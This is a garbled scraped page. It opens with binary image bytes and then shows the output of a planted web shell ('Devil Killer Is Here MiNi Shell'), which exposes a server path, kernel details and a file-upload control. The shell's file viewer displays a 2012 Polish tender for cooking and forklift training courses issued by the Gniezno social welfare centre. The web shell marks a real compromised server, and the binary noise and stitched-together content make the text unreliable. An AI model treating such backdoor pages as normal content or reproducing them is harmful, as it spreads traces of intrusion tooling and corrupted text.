JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121017/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121017/402204-N-2012.html

<p class="kh_header"><b>Gniezno: USŁUGI SZKOLENIOWE dla podopiecznych Miejskiego Ośrodka Pomocy Społecznej w Gnieźnie: I część zamówienia: 
I część zamówienia: Kurs przygotowujący do zawodu kucharza - dla 15 osób; II część zamówienia: Kurs obsługi wózków widłowych - dla 37 osób</b><br>
<b>Numer ogłoszenia: 402204 - 2012; data zamieszczenia: 17.10.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Społecznej w Gnieźnie , ul. Kolejowa 2, 62-200 Gniezno, woj. wielkopolskie, tel. 61 426-25-82; 426 30 16, faks 61 426-25-82 wew. 68.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mops.gniezno.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> USŁUGI SZKOLENIOWE dla podopiecznych Miejskiego Ośrodka Pomocy Społecznej w Gnieźnie: I część zamówienia: 
I część zamówienia: Kurs przygotowujący do zawodu kucharza - dla 15 osób; II część zamówienia: Kurs obsługi wózków widłowych - dla 37 osób.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 3.1. Przedmiot zamówienia w zakresie części nr 1 dotyczy usługi szkoleniowej: Kursu przygotowujący do zawodu kucharza - dla 15 osób
Kurs powinien obejmować następujący zakres tematyczny: 

Zajęcia teoretyczne: 40 godzin lekcyjnych (po 45 minut) / osobę

Wiadomości wstępne, 
- pojęcie i podział gastronomii,
- rodzaje zakładów gastronomicznych,
- zakres działalności,

Organizacja zakładów gastronomicznych, wyposażenie techniczne, 
- działy zakładu gastronomicznego,
- magazyny żywnościowe,
- wyposażenie pomieszczeń,

Zasady bezpieczeństwa i higieny pracy, 
- zasady dobrej praktyki higienicznej, cateringowej,
- system HACCAP,
- wymagania higieniczne dla zakładów gastronomicznych,
- wymagania dla pracowników pracujących w gastronomii,


Przygotowywanie potraw:

Potrawy z warzyw i ziemniaków, 
- obróbka wstępna z warzyw i ziemniaków,
- podział warzyw,
- sporządzanie surówek,
- asortyment surówek,
- gotowanie warzyw,
- asortyment z warzyw gotowanych,
- dodatki,
- potrawy z ziemniaków,
- postępowanie z produktem i wyrobem gotowym,

Potrawy z grzybów, 
- podział grzybów,
- obróbka wstępna,
- zastosowanie w produkcji gastronomicznej,
- wpływ na zdrowie człowieka,

Potrawy z owoców, 
- podział owoców,
- obróbka wstępna owoców,
- zastosowanie w produkcji gastronomicznej,
- wpływ na zdrowie człowieka,

Potrawy z mleka, 
- zastosowanie mleka słodkiego w produkcji gastronomicznej,
- napoje mleczne fermentowane,
- śmietana i śmietanka,
- masło,
- sery twarogowe,
- sery dojrzewające,

Potrawy z jaj, 
- ogólna charakterystyka potraw z jaj,
- zastosowanie jaj w produkcji gastronomicznej,

Potrawy  mączne, 
- cechy użytkowe mąki,
- etapy produkcji ciast,
- technika wykonania ciasta makaronowego i kluskowego,
- sporządzenie pierogów i gotowanie potraw,

Potrawy z kasz, 
- rodzaje kasz,
- obróbka wstępna kasz,
- potrawy z kasz,
- gotowanie kasz,

Zupy i sosy gorące, 
- sporządzanie zup,
- asortyment zup,
- podział zup,
- dodatki,
- zagęszczanie zup,
- podział sosów,
- asortyment sosów,
- zastosowanie i technika wykonania,

Potrawy z mięsa, 
- przygotowanie półproduktu,
- sporządzanie,
- asortyment potraw z mięsa,
- dodatki do mięs,
- sposób podania,

Potrawy z drobiu, 
- przygotowanie półproduktu,
- sporządzanie, 
- asortyment potraw z drobiu,
- dodatki,
- sposób podania,

Potrawy z ryb, 
- przygotowanie półproduktu,
- sporządzanie,
- asortyment potraw z ryb,
- dodatki,
- sposób podania,

Potrawy półmięsne, 
- sporządzanie potraw gotowanych, smażonych, duszonych, pieczonych, zapiekanych
- asortyment potraw półmięsnych,
- dobór dodatków,
- sposób podania,

Zakąski na zimno i gorąco, 
- sporządzanie zakąsek z warzyw, mięsa, drobiu i ryb,
- zasady dekoracji, zdobienia zakąsek,

Napoje zimne i gorące, 
- pojęcie i podział napojów,
- technika sporządzania,
- asortyment,
- technika podania,
- dekoracja,

Zajęcia praktyczne: 110 godzin zegarowych / osobę (w tym egzamin końcowy)
Potrawy jarskie, 
Potrawy z ziemniaków, 
Zakąski z warzyw, 
Sałatki, 
Potrawy z grzybów, 
Potrawy z owoców, 
Potrawy z jaj, 
Zakąski z jaj, 
Potrawy z mleka i przetworów mlecznych, 
Ciasta makaronowe i sosy gorące, 
Naleśniki, 
Ciasto ziemniaczane i serowe, 
Potrawy z kasz, 
Zupy, 
Mięsa gotowane, 
Mięsa duszone, 
Mięsa smażone, 
Mięsa pieczone, 
Podroby, 
Potrawy z grila, 
Zakąski z mięsa, 
Drób gotowany, 
Drób duszony, 
Drób smażony, 
Drób pieczony, 
Zakąski z drobiu, 
Potrawy z ryb, 
Zakąski z ryb, 
Potrawy ze śledzi, 
Potrawy półmięsne, 

Wymagana liczba godzin/osobę: 150 godzin w tym 40 godzin lekcyjnych (po 45 minut) teorii, 110 godzin zegarowych praktyki.
Termin realizacji kursu: nie wcześniej niż od 06.11.2012 r. i nie później niż do 04.12.2012 r.
Kurs musi odbywać się w podziale na 2 grupy, których liczebność nie będzie przekraczała 9 osób,  z uwzględnieniem, iż
- pierwsza grupa będzie odbywała zajęcia w godz. 8.00 - 14.00,
- druga grupa będzie odbywała zajęcia w godz. 14.30 - 20.30.
Kurs powinien być realizowany wg planu nauczania obejmującego nie więcej niż 6 godzin zegarowych dziennie na osobę. 
Miejsce kursu: zajęcia muszą się odbywać na terenie miasta Gniezna.
Uczestnicy kursu zostaną wybrani przez Zamawiającego, a Wykonawca przed rozpoczęciem kursu otrzyma wykaz osób skierowanych na kurs. W przypadku nie podjęcia przez wskazaną osobę kursu lub przerwanie w trakcie trwania kursu Wykonawca ma obowiązek niezwłocznie zawiadomić o tym fakcie Zamawiającego, który ma prawo skierować na to miejsce inną osobę.

Kurs musi być prowadzony wyłącznie dla uczestników projektu Edukacja ku samodzielności - propagowanie aktywnej integracji osób oddalonych od rynku pracy w mieście Gnieźnie i wyłącznie z ich udziałem.
Do realizacji kursu Wykonawca musi zapewnić uczestnikom kursu wszelkie niezbędne i odpowiednie materiały szkoleniowe (np. podręczniki, zeszyty, materiały piśmienne, prezentacje lub tym podobne) oraz materiały niezbędne do nauki zawodu. Materiały szkoleniowe związane z częścią teoretyczną muszą być adekwatne do treści kursu i opatrzone informacją o współfinansowaniu, flagą UE oraz logo Programu Operacyjnego Kapitał Ludzki (zgodnie z aktualnym Planem Komunikacji POKL 2007-2013 oraz Wytycznymi dot. oznaczania projektów w ramach POKL). Materiały powinny być przekazane każdemu uczestnikowi za pokwitowaniem na początku kursu bądź na bieżąco zgodnie z tematyką realizowanych zajęć. Ponadto 1 egzemplarz materiałów lub ich kserokopię potwierdzoną za zgodność z oryginałem Wykonawca jest zobowiązany przekazać Zamawiającemu.
Wykonawca musi prowadzić dziennik zajęć zawierający: wymiar godzin, tematy zajęć edukacyjnych oraz listy obecności i przekazać je Zamawiającemu po zakończeniu kursu w oryginale wraz z potwierdzeniem przez wykładowców i wykonawcę (podpis i pieczęć).
Wykonawca musi zapewnić wykonanie i opłatę niezbędnych badań lekarskich orzekających brak przeciwwskazań zdrowotnych do odbycia kursu i uzyskania uprawnień.
Wykonawca musi zapewnić odzież ochronną (fartuchy, czepki, obuwie) dla wszystkich osób uczestniczących w kursie, zgodnie z obowiązującymi przepisami bezpieczeństwa i higieny pracy.
Wykonawca musi zapewnić uczestnikom w odpowiedniej ilości ciepłe (kawa, herbata) i zimne napoje (soki, woda mineralna gazowana i niegazowana) oraz przekąski w postaci kruchych ciastek, maślanych, biszkoptowych lub słonych (np. paluszki), itp.
Zamawiający wymaga, aby kurs odbywał się w pomieszczeniach przestronnych, zapewniających odpowiednią do liczby osób uczestniczących ilość miejsc siedzących w trakcie części teoretycznej w układzie pozwalającym na swobodne wykonywanie notatek i poruszanie się po sali i odpowiednią ilość stanowisk w trakcie części praktycznej. Wykonawca  musi zapewnić zaplecze socjalne i sanitarne zarówno w trakcie części teoretycznej jak i praktycznej.
Zamawiający wymaga, aby kurs zakończył się oceną opanowania wiedzy i nabytych umiejętności w formie egzaminu przeprowadzonego przez Wykonawcę zgodnie z rozporządzeniem Ministra Edukacji i Nauki z dnia 03 lutego 2006 r. w sprawie uzyskiwania i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych (Dz. U. Nr 31, poz. 216).
Termin egzaminu należy wskazać w harmonogramie kursu.
Kurs musi zakończyć się wydaniem zaświadczeń o jego ukończeniu opatrzonych informacją o współfinansowaniu oraz logo UE, EFS i POKL. Wykonawca jest zobowiązany do przekazania Zamawiającemu kserokopii zaświadczeń potwierdzonych za zgodność z oryginałem i oryginalnej listy potwierdzającej odbiór w/w zaświadczeń lub certyfikatów, potwierdzonej przez wykonawcę podpisem i pieczęcią.
Wykonawca jest zobowiązany do pokrycia kosztów ubezpieczenia NW uczestników na czas trwania kursu.

2. Przedmiot zamówienia w zakresie części nr 2 dotyczy usługi szkolenia: Kursu obsługi wózków widłowych - dla 37 osob

Kurs powinien się odbywać wg następującego programu:
Zajęcia teoretyczne: 52 godz. lekcyjne (po 45 minut) / osobę
Typy stosowanych wózków jezdniowych, 
Budowa wózka, 
Czynności kierowcy przy obsłudze wózków przed podjęciem pracy i po pracy, 
Czynności kierowcy w czasie pracy z wózkami, 
Wiadomości z zakresu ładunkoznawstwa, 
Wiadomości z zakresu bhp, 
Wiadomości o dozorze technicznym, 
Bezpieczna obsługa - wymiana butli gazowych w wózkach wyposażonych w te urządzenia, 

Zajęcia praktyczne: 15 godz. zegarowych/ osobę (w tym egzamin końcowy)
Instruktaż stanowiskowy,
Ćwiczenia w posługiwaniu się urządzeniami do kierowania i sterowania na unieruchomionym wózku,
Jazda bez ładunku,
Podjazd pod ładunek,
Podjęcie ładunku,
Rozładunek ładunku,
Jazda z ładunkiem ,
Manewry z wózkami,
Postój wózka,
Czynności obsługowe wykonywane przed pracami manewrowymi i po pracy
Wymagana liczba godzin/ osobę: 67 godzin, w tym 52 godziny lekcyjne (po 45 minut) teorii i 15 godzin zegarowych praktyki.
Termin realizacji kursu: nie wcześniej niż 06.11.2012 r., zakończenie kursu powinno nastąpić nie później niż 08.12.2012 r.
Zajęcia teoretyczne muszą się odbywać w podziale na 2 grupy, których liczebność nie będzie przekraczała 21 osób, z uwzględnieniem, iż:
- pierwsza grupa będzie odbywała zajęcia w godz. 8.00- 14.00,
- druga grupa będzie odbywała zajęcia w godz. 14.30- 20.30.
Kurs musi być realizowany wg planu nauczania obejmującego nie więcej niż 6 godzin zegarowych dziennie na osobę. 
Miejsce kursu: zajęcia muszą odbywać się na terenie miasta Gniezna.
Uczestnicy kursu zostaną wybrani przez Zamawiającego, a Wykonawca przed rozpoczęciem kursu otrzyma wykaz osób skierowanych na kurs. W przypadku nie podjęcia przez wskazaną osobę kursu lub przerwanie w trakcie trwania kursu Wykonawca ma obowiązek niezwłocznie zawiadomić o tym fakcie Zamawiającego, który ma prawo skierować na to miejsce inną osobę.
Kurs musi być prowadzony wyłącznie dla uczestników projektu Edukacja ku samodzielności - propagowanie aktywnej integracji osób oddalonych od rynku pracy w mieście Gnieźnie i wyłącznie z ich udziałem.
Do realizacji kursu Wykonawca musi zapewnić uczestnikom wszelkie niezbędne i odpowiednie materiały szkoleniowe (np. podręczniki, zeszyty, materiały piśmienne, prezentacje lub tym podobne) oraz materiały niezbędne do nauki zawodu. Materiały szkoleniowe związane z częścią teoretyczną muszą być adekwatne do treści kursu i opatrzone informacją o współfinansowaniu, flagą UE oraz logo Programu Operacyjnego Kapitał Ludzki (zgodnie z aktualnym Planem Komunikacji POKL 2007-2013 oraz Wytycznymi dot. oznaczania projektów w ramach POKL). Materiały powinny być przekazane każdemu uczestnikowi za pokwitowaniem na początku kursu bądź na bieżąco zgodnie z tematyką realizowanych zajęć. Ponadto 1 egzemplarz materiałów lub ich kserokopię potwierdzoną za zgodność z oryginałem Wykonawca jest zobowiązany przekazać Zamawiającemu.
Wykonawca musi prowadzić dziennik zajęć zawierający: wymiar godzin, tematy zajęć edukacyjnych oraz listy obecności i przekazać je Zamawiającemu po zakończeniu kursu w oryginale wraz z potwierdzeniem przez wykładowców i wykonawcę (podpis i pieczęć).
Wykonawca musi zapewnić wykonanie i opłatę badań lekarskich orzekających brak przeciwwskazań zdrowotnych do odbycia kursu i uzyskania uprawnień.
Wykonawca musi zapewnić uczestnikom w odpowiedniej ilości ciepłe (kawa, herbata) i zimne napoje (soki, woda mineralna gazowana i niegazowana) oraz przekąski w postaci kruchych ciastek, maślanych, biszkoptowych lub słonych (np. paluszki), itp.
Zamawiający wymaga, aby część teoretyczna kursu odbywała się w pomieszczeniach przestronnych, zapewniających odpowiednią do liczby osób uczestniczących ilość miejsc siedzących w układzie pozwalającym na swobodne wykonywanie notatek, a także  poruszanie się po sali. Wykonawca  musi zapewnić zaplecze socjalne i sanitarne zarówno w trakcie części teoretycznej jak i praktycznej.	
Zajęcia praktyczne muszą odbywać się w grupach 3-osobowych/1 wózek, zgodnie z programem nauczania.
Zamawiający wymaga, aby kurs zakończył się oceną opanowania wiedzy i nabytych umiejętności w formie egzaminu przeprowadzonego przez Wykonawcę zgodnie z rozporządzeniem Ministra Edukacji i Nauki z dnia 03 lutego 2006 r. w sprawie uzyskiwania i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych (Dz. U. Nr 31, poz. 216).
Termin egzaminu należy wskazać w harmonogramie kursu.
Kurs musi zakończyć się wydaniem zaświadczeń o jego ukończeniu opatrzonych informacją o współfinansowaniu oraz logo UE, EFS i POKL. Wykonawca jest zobowiązany do przekazania Zamawiającemu kserokopii zaświadczeń potwierdzonych za zgodność z oryginałem i oryginalnej listy potwierdzającej odbiór w/w zaświadczeń lub certyfikatów, potwierdzonej przez wykonawcę podpisem i pieczęcią.
Wykonawca jest zobowiązany do pokrycia kosztów ubezpieczenia NW uczestnika szkolenia na czas szkolenia.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamówienia uzupełniające dotyczyć mogą zwiększenia ilości osób objętych kursem o max. 50 procent wartości zamówienia podstawowego</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.53.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 08.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>o	Weryfikacja posiadania uprawnień do wykonywania określonej działalności lub czynności polegać będzie w oparciu o oświadczenie o wpisie instytucji szkoleniowej do Rejestru Instytucji Szkoleniowych prowadzonego przez właściwy ze względu na siedzibę instytucji Wojewódzki Urząd Pracy aktualne na rok 2012, złożone przez Wykonawcę w niniejszym postępowaniu wraz z wydrukiem ze strony internetowej www.ris.praca.gov.pl. potwierdzającym powyższe, metodą warunku granicznego - spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu weryfikacji warunku posiadania przez Wykonawcę doświadczenia i wiedzy Zamawiający wymaga od Wykonawcy:

1. w przypadku Kursu przygotowującego do zawodu kucharza, doświadczenia w przeprowadzeniu co najmniej 2 kursów w zakresie będącym przedmiotem zamówienia, w tym co najmniej 1 kursu w ramach projektów finansowanych ze środków Unii Europejskiej, w ciągu ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, a ilość osób uczestnicząca w poszczególnych kursach/ grupach wynosiła min. 4 osoby, co udokumentowane zostanie dołączonymi referencjami potwierdzającymi należyte wykonanie zadań.

2. w przypadku Kursu obsługi wózków widłowych, doświadczenia w przeprowadzeniu co najmniej 2 kursów w zakresie będącym przedmiotem zamówienia, w tym co najmniej 1 kursu w ramach projektów finansowanych ze środków Unii Europejskiej w ciągu ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, a ilość osób uczestnicząca w poszczególnych kursach/ grupach wynosiła min. 5 osób, co udokumentowane zostanie dołączonymi referencjami potwierdzającymi należyte wykonanie zadań</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W przypadku weryfikacji warunku dysponowania osobami zdolnymi do wykonania zamówienia, Zamawiający będzie oceniać posiadane wykształcenie i liczbę przeprowadzonych szkoleń w zakresie zagadnień będących przedmiotem zamówienia na podstawie wykazu  osób, które będą uczestniczyć w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnego do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności oraz informację o podstawie do dysponowania tymi osobami, przy czym: 
1. W przypadku Kursu przygotowującego do zawodu kucharza:
- Zajęcia teoretyczne muszą być prowadzone przez co najmniej 1 osobę posiadającą wykształcenie wyższe, zgodne z przedmiotem zamówienia oraz posiadającą co najmniej 2 letnie doświadczenie zawodowe w wykonywaniu zawodu zgodnego z przedmiotem zamówienia w okresie ostatnich 3 lat przed upływem terminu składania ofert. 
- Zajęcia praktyczne winny być prowadzone przez co najmniej 1 osobę posiadającą wykształcenie co najmniej zasadnicze zawodowe oraz tytuł mistrza zgodny z przedmiotem zamówienia, a także co najmniej 2 letnie doświadczenie zawodowe w wykonywaniu zawodu zgodnego z przedmiotem zamówienia w okresie ostatnich 3 lat przed upływem terminu składania ofert.

2. W przypadku Kursu obsługi wózków widłowych osoby wskazane do przeprowadzenia zamówienia muszą posiadać: uprawnienia instruktora nauki obsługi wózków widłowych - minimum 3 lata oraz posiadały doświadczenie w prowadzeniu co najmniej 2 kursów zgodnych z zakresem przedmiotu zamówienia w okresie ostatnich 3 lat przed upływem terminu składania ofert</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
